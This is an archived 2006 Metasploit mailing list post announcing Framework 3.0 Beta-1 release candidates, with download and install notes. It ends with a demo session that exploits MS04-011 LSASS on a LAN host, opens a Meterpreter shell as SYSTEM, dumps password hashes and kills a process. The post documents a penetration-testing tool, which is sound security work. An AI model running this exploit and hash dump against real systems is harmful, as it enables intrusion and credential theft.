Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Metasploit Framework 3.0 Beta 1 (Almost!)

From: hdm at metasploit.com (H D Moore)
Date: Mon, 31 Jul 2006 03:20:31 -0500
Hi everyone,

We could use some help testing out the next version of the Metasploit 
Framework. If you could take a few minutes to download the release 
candidates below and send us your feedback, we would appreciate it. If 
everything goes well, the actual Beta-1 release of 3.0 will happen on the 
morning of August 2nd (Wednesday) at the Black Hat conference in Las 
Vegas. If you would like to discuss the beta release with other users, 
please subscribe to the framework-beta mailing list by sending a blank 
email to framework-beta-subscribe[at]metasploit.com. Please keep all 
replies related to the beta release candidate off of the main framework 
mailing list in order to spare the bandwidth of those not interested.

Some quick highlights compared to version 2.6:
- Smaller exploit set, since not everything has been ported
- All modules are organized in a tree, versus flat lists
- The Meterpreter payload is much smoother all around
- New type of "passive" exploits (browser, sniffer, ids attacks)
- Denial of service modules (ms05-035 and unpatched RRAS)
- Support for multiple shells per exploit with passive modules

Unix users should use the following tarball:
- http://metasploit.com/tools/framework-3.0-beta-1-rc1.tar.gz

Windows users should use the following installer:
- http://metasploit.com/tools/framework-3.0-beta-1-rc1.exe

Unix users may need to install the openssl and zlib ruby modules for the 
Framework to load. If you are using Ubuntu, run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby

User of other distributions or Unix flavors may want to grab the latest 
version of ruby from www.ruby-lang.org and build it from source.

Windows users will need to exit out of any running Cygwin-based 
applications before running the installer or using the Framework. We 
really tried to work with the native ruby interpreter for Windows, but 
numerous io/readline/stdin issues came up and we will try again once the 
code base gets a little more stable.

These RC1 installers will be removed as soon as the final version of 
Beta-1 becomes stable. Please read documentation/LICENSE for the new 
licensing terms of the Metasploit Framework (3.x only).

Thanks!

-HD

A quick demonstration of using msfconsole with meterpreter:


 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads
+ -- --=[ 16 encoders - 4 nops
       =[ 4 aux

msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 -> 
192.168.0.106:4444)
[*] The DCERPC service did not reply to our request

Loading extension stdapi...success.
meterpreter > getuid
Server username: SYSTEM

meterpreter > use priv
Loading extension priv...success.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WIN2000DC:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IWAM_WIN2000DC:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NetShowServices:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TsInternetUser:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > cd c:\
meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified                 Name
----              ----       ----  -------------                 ----
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  IO.SYS
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  MSDOS.SYS
40777/rwxrwxrwx   0          dir   Sat Oct 09 11:21:49 CDT 2004  RECYCLER
40777/rwxrwxrwx   0          dir   Sat May 21 18:12:30 CDT 2005  WINNT
100666/rw-rw-rw-  195        fil   Sat Oct 09 05:38:57 CDT 2004  boot.ini
100444/r--r--r--  214416     fil   Mon Dec 06 14:00:00 CST 1999  ntldr
[ snip ]

meterpreter > ps

Process list
============

    PID   Name               Path
    ---   ----               ----
    176   smss.exe           \SystemRoot\System32\smss.exe
    200   csrss.exe          \??\C:\WINNT\system32\csrss.exe
    224   winlogon.exe       \??\C:\WINNT\system32\winlogon.exe
    252   services.exe       C:\WINNT\system32\services.exe
    264   lsass.exe          C:\WINNT\system32\lsass.exe
    440   svchost.exe        C:\WINNT\system32\svchost.exe
[ snip ]
    1804  wins.exe           C:\WINNT\System32\wins.exe
    2676  logon.scr          C:\WINNT\system32\logon.scr

meterpreter > kill 2676
Killing: 2676
Previous By Date Next
Previous By Thread Next

Current thread: